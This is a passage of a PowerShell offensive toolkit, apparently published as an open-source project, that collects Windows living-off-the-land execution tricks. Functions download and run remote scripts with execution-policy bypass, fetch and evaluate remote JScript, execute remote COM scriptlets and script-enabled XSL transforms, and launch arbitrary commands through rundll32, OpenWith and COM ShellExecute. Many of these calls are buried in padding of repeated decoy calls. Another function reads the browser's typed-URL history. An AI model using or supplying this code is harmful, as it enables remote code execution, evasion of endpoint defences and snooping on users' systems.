invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 265 | 2 invoke-Confusions-LLMTCOMCLSID -CLSID 266 | 3 Invoke-COMScriptlet -SCT http:///local.sct/ 267 | 4 invoke-DLLLaunchApplication -CML calc.exe 268 | 5 invoke-lateralmovement -Command calc.exe 269 | 6 invoke-VBNET -CMLShell calc.exe 270 | 7 invoke-XMLTransform -XSL URL -XML URL 271 | 8 invoke-OpenWith -CML notepad.exe 272 | 9 invoke-DxCap -CML notepad.exe 273 | 10 invoke-ApplicationShellExecute -CML calc.exe 274 | 11 invoke-ADinfo -Type List 275 | 12 Get-TokenMsftEdge -Type List 276 | 13 invoke-URLPSShell -URI URL! 277 | 278 | " 279 | } 280 | } 281 | 282 | 283 | function invoke-URLPSShell { 284 | <# 285 | 286 | 287 | .Author Matt harr0ey @harr0ey 288 | .License BSD3 289 | .Required Dependencies : None 290 | .Optional Dependencies : None 291 | 292 | .Description vicarious of Broadly Execute in Natural Mode Powershell Remotely Script 293 | 294 | 295 | .Exmaple 296 | PS:> invoke-URLPSShell -URI !URLScript 297 | 298 | 299 | 300 | #> 301 | 302 | 303 | [CmdletBinding()] 304 | 305 | param ( 306 | 307 | [Parameter(Mandatory=$true)] 308 | 309 | [Parameter(Position = 0, ParameterSetName = 'URI')] 310 | 311 | [string]$URI 312 | 313 | ) 314 | 315 | if ($URI) { 316 | 317 | try { 318 | $Conveyor = Invoke-WebRequest $URI 319 | powershell -ep bypass /c $Conveyor 320 | 321 | }Catch { 322 | 323 | throw "[ ! ] Error Via Non-entrance The URL" 324 | 325 | } 326 | 327 | } 328 | 329 | } 330 | 331 | 332 | 333 | 334 | function invoke-ADinfo { 335 | 336 | <# 337 | 338 | 339 | .Author ( @harr0ey ) 340 | .License BSD3 341 | .Required Dependencies: None 342 | .Optional Dependencies: None 343 | 344 | 345 | 346 | .Broadly 347 | display System INFo List AD/Domain Users 348 | 349 | 350 | 351 | .Example 352 | PS:> invoke-ADinfo -Type List 353 | 354 | #> 355 | 356 | [CmdletBinding()] 357 | 358 | param ( 359 | 360 | [Parameter(Mandatory=$true)] 361 | [Parameter(Position = 0, ParameterSetName = 'Type')] 362 | [String]$Type 363 | 364 | ) 365 | 366 | 367 | 368 | if ($like = $Type) { 369 | $WscriptSysinfo = [activator]::CreateInstance([type]::GetTypeFromCLSID("{093FF999-1EA0-4079-9525-9614C3504B74}")) 370 | $CIMSysinfo = Get-CimInstance CIM_System 371 | $CIMSysinfo+$WscriptSysinfo 372 | 373 | } 374 | } 375 | 376 | function invoke-ApplicationShellExecute { 377 | 378 | <# 379 | 380 | 381 | .Author ( @harr0ey ) 382 | .License BSD3 383 | .Required Dependencies: None 384 | .Optional Dependencies: None 385 | 386 | 387 | 388 | .Broadly 389 | Execute Command line Via use lateral Movement CLSID/COM 390 | 391 | 392 | 393 | .Example 394 | PS:> invoke-ApplicationShellExecute -CML calc.exe 395 | 396 | #> 397 | 398 | [CmdletBinding()] 399 | 400 | param ( 401 | 402 | [Parameter(Mandatory=$true)] 403 | [Parameter(Position = 0, ParameterSetName = 'CML')] 404 | [String]$CML 405 | 406 | ) 407 | 408 | 409 | 410 | if ($like = $CML) { 411 | 412 | $ADDValueLLMTShell = $CML 413 | $s2 = [activator]::CreateInstance([type]::GetTypeFromCLSID("{13709620-C279-11CE-A49E-444553540000}")) 414 | $s2.Application.ShellExecute("pcalua") 415 | $s2.Application.ShellExecute("pcalua") 416 | $s2.Application.ShellExecute("pcalua") 417 | $s2.Application.ShellExecute("pcalua") 418 | $s2.Application.ShellExecute("pcalua") 419 | $s2.Application.ShellExecute("pcalua") 420 | $s2.Application.ShellExecute("pcalua") 421 | $s2.Application.ShellExecute("pcalua") 422 | $s2.Application.ShellExecute("pcalua") 423 | $s2.Application.ShellExecute("pcalua") 424 | $s2.Application.ShellExecute("$CML") 425 | 426 | } 427 | } 428 | 429 | function Get-TokenMsftEdge { 430 | 431 | 432 | [CmdletBinding(SupportsPaging = $true)] 433 | 434 | param( 435 | 436 | [Parameter(Mandatory=$True,Position=0)] 437 | 438 | 439 | 440 | [parameter(Mandatory=$true,ParameterSetName="NULL")] 441 | 442 | 443 | 444 | [System.String]$Type 445 | 446 | ) 447 | 448 | 449 | 450 | if ($null = $Type) { 451 | 452 | $SnifferEdgedrag = Join-Path -Path "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\" -ChildPath TypedURLs 453 | 454 | Get-ItemProperty -Path $SnifferEdgedrag 455 | 456 | ( Out-String ) 457 | 458 | 459 | } 460 | } 461 | 462 | function invoke-OpenWith { 463 | 464 | <# 465 | 466 | 467 | .Author ( @harr0ey ) 468 | .License BSD3 469 | .Required Dependencies: None 470 | .Optional Dependencies: None 471 | 472 | 473 | 474 | .Broadly 475 | Tool Command line Execution Via OpenWith.exe USe OpenWith To Run Command Line Via Default Program 476 | 477 | 478 | 479 | .Example 480 | PS:> invoke-OpenWith -CML notepad.exe 481 | 482 | #> 483 | 484 | [CmdletBinding()] 485 | 486 | param ( 487 | 488 | [Parameter(Mandatory=$true)] 489 | [Parameter(Position = 0, ParameterSetName = 'CML')] 490 | [String]$CML 491 | 492 | ) 493 | 494 | 495 | 496 | if ($like = $CML) { 497 | 498 | $ADDValueOpenWith = $CML 499 | OpenWith.exe /c $CML 500 | 501 | 502 | } 503 | } 504 | 505 | 506 | function invoke-XMLTransform { 507 | 508 | <# 509 | .Author ( bohop ) 510 | .License BSD3 511 | 512 | Require Dependencies : None 513 | Optional Dependencies : None 514 | 515 | .Broadly 516 | Powershell Function XML Execute XSL Using Transform XML To Send Reader XSL in Powershell Object XML 517 | 518 | .Note1 519 | first Thing should Create File XSL this code Next 520 | 521 | 522 | 523 | 527 | 528 | 529 | function xml(nodelist) { 530 | var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); 531 | return nodelist.nextNode().xml; 532 | 533 | } 534 | 535 | 536 | 537 | 538 | 539 | 540 | .Note2 541 | after Upload XSL To Gist in Github You can click to raw and add this URL XSL in XML This Function href-XML Code next 542 | 543 | 544 | 545 | 546 | 547 | Microsoft 548 | 549 | 550 | 551 | #> 552 | 553 | [CmdletBinding()] 554 | 555 | param ( 556 | 557 | [Parameter(Mandatory=$true)] 558 | 559 | [String]$XSL,$XML 560 | ) 561 | 562 | if ($like = $PSCmdlet) { 563 | $0xAddXSL = $XSL 564 | $0x0AddXML = $XML 565 | $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load("$XSL",$s,$r);$x.Transform("$XML",'z');del z; 566 | 567 | 568 | } 569 | 570 | } 571 | 572 | function invoke-VBNET { 573 | <# 574 | 575 | .Author Matt Harr0ey 576 | .License BSD3 577 | .Require Dependencies : None 578 | .Optional Dependencies : None 579 | 580 | Broadly 581 | Command line CML Execution using .NET VisualBasic Object 582 | 583 | 584 | .Example invoke-VBNET -CMLShell calc.exe 585 | 586 | 587 | 588 | #> 589 | 590 | [CmdletBinding()] 591 | 592 | param ( 593 | 594 | [Parameter(Mandatory=$true)] 595 | [Parameter(Position = 0, ParameterSetName = 'CMLShell')] 596 | [String]$CMLShell 597 | 598 | ) 599 | 600 | if ($like = $CMLShell) { 601 | 602 | try { 603 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 604 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 605 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 606 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 607 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 608 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 609 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 610 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 611 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 612 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 613 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 614 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 615 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 616 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 617 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 618 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::Shell("$CMLShell","0"); 619 | 620 | }Catch { 621 | 622 | throw '[!]Error: Add CML Execution' 623 | 624 | } 625 | 626 | } 627 | } 628 | 629 | function Invoke-COMScriptlet { 630 | 631 | 632 | [CmdletBinding()] 633 | 634 | param ( 635 | 636 | [Parameter(Mandatory=$true)] 637 | [Parameter(Position = 0, ParameterSetName = 'SCT')] 638 | [String]$SCT 639 | 640 | ) 641 | if ($like = $SCT) { 642 | 643 | try { 644 | $SCTAddValue = "$SCT" 645 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 646 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 647 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 648 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 649 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 650 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 651 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 652 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 653 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 654 | 655 | [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject("script:$SCT").Exec(0) 656 | } Catch { 657 | throw ' [!] Error: URL SCT COM File ' 658 | 659 | } 660 | 661 | 662 | } 663 | 664 | } 665 | 666 | function invoke-DLLLaunchApplication { 667 | 668 | <# 669 | 670 | .Author Matt Harr0ey 671 | 672 | .Licence BSD3 673 | 674 | Require Dependencies : None 675 | Optional Dependencies : None 676 | 677 | .Broadly 678 | CML Command Line Execution using DLL Via Launch Application Function 679 | 680 | .Example 681 | PS:> invoke-DLLLaunchApplication 682 | #> 683 | 684 | 685 | [CmdletBinding()] 686 | param ( 687 | 688 | [Parameter(Mandatory=$true)] 689 | 690 | [Parameter(Position = 0, ParameterSetName = 'CML')] 691 | 692 | [String]$CML 693 | 694 | ) 695 | 696 | if ($like = $CML) { 697 | 698 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 699 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 700 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 701 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 702 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 703 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 704 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 705 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 706 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 707 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 708 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 709 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 710 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 711 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 712 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 713 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 714 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 715 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 716 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 717 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 718 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 719 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 720 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 721 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 722 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 723 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 724 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 725 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 726 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 727 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication $CML 728 | 729 | } 730 | 731 | } 732 | 733 | function invoke-ConfusionJS { 734 | 735 | 736 | <# 737 | 738 | .Author Matt Harr0ey 739 | 740 | .Licence BSD3 741 | 742 | .Require Dependencies : None 743 | .Optional Dependencies : None 744 | 745 | .Broadly Execution JSCript Via .NET in Reflection Assembly To Excution ActiveX 746 | 747 | .Parameter everything is valid 748 | 749 | 750 | .Parameter Binding Execution is valid 751 | 752 | .Parameter Powershell File is valid 753 | 754 | 755 | #> 756 | 757 | [CmdletBinding()] 758 | 759 | param ( 760 | 761 | [Parameter(Mandatory=$false)] 762 | 763 | [Parameter(Position = 0, ParameterSetName = 'Command')] 764 | [String]$Command,$Remote 765 | ) 766 | 767 | if ($null = $Command) { 768 | Write-Host "" 769 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript') 770 | $Attack = $Command 771 | [void] [Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 772 | # Will Add Value in This Spaces 773 | # 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 774 | 775 | } 776 | elseif ($like = $Remote) { 777 | 778 | $MMCC002=curl.exe --basic "$Remote" 779 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript') 780 | [Microsoft.JScript.Eval]::JScriptEvaluate($MMCC002,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 781 | 782 | } 783 | } 784 | 785 | function invoke-Confusions-LLMTCOMCLSID { 786 | 787 | [CmdletBinding()] 788 | 789 | param ( 790 | 791 | [Parameter(Mandatory=$true)] 792 | 793 | [Parameter(Position = 0, ParameterSetName = 'CLSIDCOM')] 794 | 795 | [String]$CLSIDCOM 796 | ) 797 | 798 | if ($null = $PSCmdlet) { 799 | 800 | try { 801 | $addValue = $CLSIDCOM 802 | $COMEx = [Activator]::CreateInstance([type]::GetTypeFromCLSID("$CLSIDCOM")) 803 | 804 | } Catch { 805 | 806 | throw 'Where CLSID Letters' 807 | } 808 | 809 | } 810 | 811 | } 812 | 813 | function invoke-lateralmovement { 814 | 815 | <# 816 | 817 | .Author Matt Harr0ey 818 | 819 | .Licence BSD3 820 | .Require Dependencies : None 821 | .Optional Dependencies : None 822 | 823 | 824 | .Broadly Lateral Movement Using ShellApp COM To Command Line Execution 825 | 826 | .Example invoke-lateralmovement -Command calc.exe 827 | 828 | #> 829 | 830 | [CmdletBinding()] 831 | param ( 832 | 833 | [Parameter(Mandatory=$true)] 834 | 835 | [Parameter(Position = 0, ParameterSetName = 'Command')] 836 | 837 | [String]$Command 838 | 839 | ) 840 | if ($null = $PSCommandPath) { 841 | 842 | $ExampleLLMT1 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 843 | $ExampleLLMT2 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 844 | $ExampleLLMT3 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 845 | $ExampleLLMT4 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 846 | $ExampleLLMT5 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 847 | $ExampleLLMT6 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 848 | $ExampleLLMT7 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 849 | $ExampleLLMT8 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 850 | $ExampleLLMT9 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 851 | $ExampleLLMT10 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 852 | $ExampleLLMT11 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 853 | $ExampleLLMT12 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 854 | $ExampleLLMT13 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 855 | $ExampleLLMT14 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 856 | $ExampleLLMT15 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 857 | $ExampleLLMT16 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 858 | $ExampleLLMT17 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 859 | $ExampleLLMT18 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 860 | $ExampleLLMT19 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 861 | $ExampleLLMT20 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 862 | $ExampleLLMT21 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 863 | $ExampleLLMT22 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 864 | $ExampleLLMT23 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 865 | $ExampleLLMT24 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 866 | $ExampleLLMT25 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 867 | $ExampleLLMT26= [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 868 | $ExampleLLMT27 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 869 | $ExampleLLMT28 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 870 | $ExampleLLMT29 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 871 | $ExampleLLMT30 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 872 | $ExampleLLMT31 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 873 | 874 | $ExampleLLMT1.Application.Application.Application.Application.ShellExecute("pcalua") 875 | $ExampleLLMT2.Application.Application.Application.Application.ShellExecute("pcalua") 876 | $ExampleLLMT3.Application.Application.Application.Application.ShellExecute("pcalua") 877 | $ExampleLLMT4.Application.Application.Application.Application.ShellExecute("pcalua") 878 | $ExampleLLMT5.Application.Application.Application.Application.ShellExecute("pcalua") 879 | $ExampleLLMT6.Application.Application.Application.Application.ShellExecute("pcalua") 880 | $ExampleLLMT7.Application.Application.Application.Application.ShellExecute("pcalua") 881 | $ExampleLLMT8.Application.Application.Application.Application.ShellExecute("pcalua") 882 | $ExampleLLMT9.Application.Application.Application.Application.ShellExecute("pcalua") 883 | $ExampleLLMT10.Application.Application.Application.Application.ShellExecute("pcalua") 884 | $ExampleLLMT11.Application.Application.Application.Application.ShellExecute("pcalua") 885 | $ExampleLLMT12.Application.Application.Application.Application.ShellExecute("pcalua") 886 | $ExampleLLMT13.Application.Application.Application.Application.ShellExecute("pcalua") 887 | $ExampleLLMT14.Application.Application.Application.Application.ShellExecute("pcalua") 888 | $ExampleLLMT15.Application.Application.Application.Application.ShellExecute("pcalua") 889 | $ExampleLLMT16.Application.Application.Application.Application.ShellExecute("pcalua") 890 | $ExampleLLMT17.Application.Application.Application.Application.ShellExecute("pcalua") 891 | $ExampleLLMT18.Application.Application.Application.Application.ShellExecute("pcalua") 892 | $ExampleLLMT19.Application.Application.Application.Application.ShellExecute("pcalua") 893 | $ExampleLLMT20.Application.Application.Application.Application.ShellExecute("pcalua") 894 | $ExampleLLMT21.Application.Application.Application.Application.ShellExecute("pcalua") 895 | $ExampleLLMT22.Application.Application.Application.Application.ShellExecute("pcalua") 896 | $ExampleLLMT23.Application.Application.Application.Application.ShellExecute("pcalua") 897 | $ExampleLLMT24.Application.Application.Application.Application.ShellExecute("pcalua") 898 | $ExampleLLMT25.Application.Application.Application.Application.ShellExecute("pcalua") 899 | $ExampleLLMT26.Application.Application.Application.Application.ShellExecute("pcalua") 900 | $ExampleLLMT27.Application.Application.Application.Application.ShellExecute("pcalua") 901 | $ExampleLLMT28.Application.Application.Application.Application.ShellExecute("pcalua") 902 | $ExampleLLMT29.Application.Application.Application.Application.ShellExecute("pcalua") 903 | $ExampleLLMT30.Application.Application.Application.Application.ShellExecute("pcalua") 904 | try { 905 | $ExampleLLMT31.Application.Application.Application.Application.ShellExecute("$Command") 906 | } catch { 907 | throw "Add Your Command" 908 | 909 | } 910 | 911 | 912 | } 913 | 914 | 915 | } 916 | 917 | 918 | --------------------------------------------------------------------------------